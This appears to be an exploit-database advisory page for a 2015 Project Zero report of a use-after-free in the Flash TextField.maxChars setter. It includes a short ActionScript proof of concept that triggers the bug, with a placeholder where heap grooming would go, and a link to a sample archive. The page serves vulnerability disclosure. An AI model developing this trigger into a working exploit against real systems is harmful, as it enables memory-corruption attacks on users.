Use-After-Free in TextField.maxChars Setter

vendor:

TextField.maxChars Setter

by:

Project Zero

7,5

CVSS

HIGH

Use-After-Free

416

CWE

Product Name: TextField.maxChars Setter

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2015

Use-After-Free in TextField.maxChars Setter

There is a use-after-free in the TextField.maxChars setter. If the maxChars the field is set to is an object with valueOf defined, the valueOf function can free the field's parent object, which is then used. A minimal PoC is as follows: var times = 0; var mc = this.createEmptyMovieClip('mc', 101); var tf = mc.createTextField('tf', 102, 1, 1, 100, 100); tf.maxChars = {valueOf : func}; function func(){ if (times == 0){ times++; return 7; } mc.removeMovieClip(); // Fix heap here return 7; }

Mitigation:

Ensure that the maxChars property is set to a valid value and not an object with a valueOf function.

Source

Exploit-DB raw data:

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=581

There is a use-after-free in the TextField.maxChars setter. If the maxChars the field is set to is an object with valueOf defined, the valueOf function can free the field's parent object, which is then used. A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.maxChars = {valueOf : func};

function func(){

        if (times == 0){
            times++;
            return 7;
        }
	mc.removeMovieClip();

        // Fix heap here

	return 7;
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39650.zip